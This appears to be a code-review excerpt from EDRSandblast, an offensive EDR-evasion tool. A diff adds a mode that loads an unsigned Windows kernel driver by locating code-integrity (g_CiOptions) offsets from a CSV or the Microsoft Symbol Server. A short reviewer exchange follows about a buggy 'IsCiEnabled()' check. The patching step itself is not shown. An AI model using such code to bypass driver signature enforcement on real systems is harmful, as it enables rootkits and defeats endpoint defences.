EDRSandblast_CLI/EDRSandblast.c

```diff
@@ -631,6 +657,106 @@ Other options:\n\
                 break;
             }
+            // Load an unsigned kernel driver.
+            case load:
+            {
+                if (_tcslen(CiOffsetCSVPath) == 0) {
+                    TCHAR CiOffsetCSVName[] = TEXT("\\CiOffsets.csv");
+                    _tcsncat_s(CiOffsetCSVPath, _countof(CiOffsetCSVPath), currentFolderPath, _countof(currentFolderPath));
+                    _tcsncat_s(CiOffsetCSVPath, _countof(CiOffsetCSVPath), CiOffsetCSVName, _countof(CiOffsetCSVName));
+                }
+
+                if (FileExists(CiOffsetCSVPath)) {
+                    LoadCiOffsetsFromFile(CiOffsetCSVPath);
+                    if (g_ciOffsets.st.g_CiOptions == 0x0) {
+                        _putts_or_not(TEXT("[!] Offsets are missing from the CSV for the version of ci in use."));
+                    }
+                    else {
+                        if (verbose) {
+                            _tprintf_or_not(TEXT("[+] g_CiOptions offset found using %s file : 0x%llx\n"), CiOffsetCSVPath, g_ciOffsets.st.g_CiOptions);
+                        }
+                    }
+                }
+
+                if (internet && (g_ciOffsets.st.g_CiOptions == 0x0)) {
+                    _putts_or_not(TEXT("[+] Downloading ci related offsets from the MS Symbol Server (will drop a .pdb file in current directory)"));
+#if _DEBUG
+                    LoadCiOffsetsFromInternet(FALSE);
+#else
+                    LoadCiOffsetsFromInternet(TRUE);
+#endif
+                    if (g_ciOffsets.st.g_CiOptions == 0x0) {
+                        _putts_or_not(TEXT("[-] Downloading offsets from the internet failed !"));
+
+                    }
+                    else {
+                        _putts_or_not(TEXT("[+] Downloading offsets succeeded !"));
+                        if (FileExists(CiOffsetCSVPath)) {
+                            _putts_or_not(TEXT("[+] Saving them to the CSV file..."));
+                            SaveCiOffsetsToFile(CiOffsetCSVPath);
+                        }
+                    }
+                    if (verbose) {
+                        _tprintf_or_not(TEXT("[+] g_CiOptions offset found using internet MS Symbol Server : 0x%llx\n"), g_ciOffsets.st.g_CiOptions);
+                    }
+                }
+
+                if (g_ciOffsets.st.g_CiOptions == 0x0) {
+                    _putts_or_not(TEXT("[!] The offsets must be computed using the provided script and added to the offsets CSV file (or use --internet). Unsigned driver won't be loaded ...\n"));
+                    lpExitCode = EXIT_FAILURE;
+                }
+                else {
+                    _putts_or_not(TEXT(""));
+                    if (kernelMode) {
+                        DWORD64 CiBaseAddress = 0;
+                        DWORD64 g_CiOptionsAddress = 0;
+                        if (IsCiEnabled() | !IsCiEnabled()) // FIX IT !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
```

Comment:
this can be simply replaced by `IsCiEnabled()` or is there anything else to fix (like the `IsCiEnabled()` function itself ?)

Reply:
It would seem indeed that the function does not work as intended